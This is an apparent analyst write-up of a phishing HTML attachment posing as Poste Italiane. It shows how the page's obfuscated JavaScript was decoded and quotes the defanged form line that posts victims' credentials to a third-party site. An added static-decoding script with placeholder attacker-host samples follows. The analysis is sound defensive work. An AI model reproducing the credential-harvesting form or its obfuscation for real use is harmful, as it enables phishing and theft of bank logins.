The number of phishing victims grows day by day in the world of information security. Phishing attackers generally reach their victims through spam emails, whose message may manipulate the victim into clicking the phishing link.
Phishing attacks are commonly used to steal a user's sensitive information, such as bank credentials and credit card information, and sometimes even to download malware payloads.
Here we have a typical case, in which the phishing document was attached to the spam email as an obfuscated attachment.
This is a phishing document imitating “Poste italiane” (the Italian postal service company): a spam email was sent to the victim with an attachment containing obfuscated JavaScript.
The email message is worded to trick the victim into opening the HTML attachment containing the obfuscated JS code.
Viewing the source of the HTML file shows JavaScript code that declares an array of values, followed by the decrypting function.
To decode the obfuscated JavaScript code, replace “document.write(em)” with “eval(em)”. This will decode the actual HTML code.
The decoded HTML again displays the same phishing HTML layout.
When analyzing a phishing document, the most important thing is to identify the action URL. This is the URL to which the collected information is sent.
This URL is usually found in the code behind a button, such as the “Accedi” button in this phishing layout. Clicking this button validates the information entered and sends it to the attacker.
In this case, while searching, I could not find any visible action URL, as the HTML document is coded in such a way that the analyst cannot easily identify the action URL.
Then I found another suspicious section, which contained an HTML escape character encoding.
Again, after decoding it, I got the action URL.
<form id="datiForm" name="datiForm" method="post" action="hxxp://www.delletredonzelle.it/contatti/jquery.ui.widget.config.php" onsubmit="return form_submit(this);">
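The last two steps (decoding the escape-encoded section and reading the form's action URL) can also be done statically, treating the attachment as data and never rendering or running it. The sketch below is an added example, not code from the original analysis; it assumes the hidden markup uses `%XX`/`%uXXXX` escapes or HTML character references, and `collector.example` is a placeholder host in constructed samples.

```javascript
// Added example: decodes escape layers as data; nothing from the sample is executed.
// Assumption: the hidden markup uses %XX / %uXXXX escapes or HTML character references.
const NAMED = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'" };
const fromCode = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

function decodeOnce(text) {
  return text
    .replace(/%u([0-9a-f]{4})/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/%([0-9a-f]{2})/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&(quot|amp|lt|gt|apos);/g, (_, n) => NAMED[n]);
}

// Peel nested layers until the text stops changing (bounded, in case of odd input).
function decodeLayers(text, maxRounds = 5) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeOnce(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return every <form> action attribute, defanged (http -> hxxp) for safe sharing.
function findActionUrls(sample) {
  const html = decodeLayers(sample);
  const re = /<form\b[^>]*?\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const urls = [];
  for (const m of html.matchAll(re)) {
    urls.push((m[1] ?? m[2] ?? m[3]).replace(/^http/i, 'hxxp'));
  }
  return urls;
}

// Constructed samples (collector.example is a placeholder, not an indicator from the page).
const SAMPLES = {
  percent: 'unescape("%3Cform%20method%3D%22post%22%20action%3D%22http%3A//collector.example/c.php%22%3E")',
  entities: '&#60;form action=&#x22;http://collector.example/c.php&#x22;&#62;',
  nested: '%26%2360%3Bform action=%26quot%3Bhttp://collector.example/c.php%26quot%3B%26%2362%3B',
};

for (const [name, s] of Object.entries(SAMPLES)) console.log(name, findActionUrls(s));
```

An empty result on a credential form is itself a finding: it usually means another encoding layer is present or the destination is assigned by script rather than in the markup.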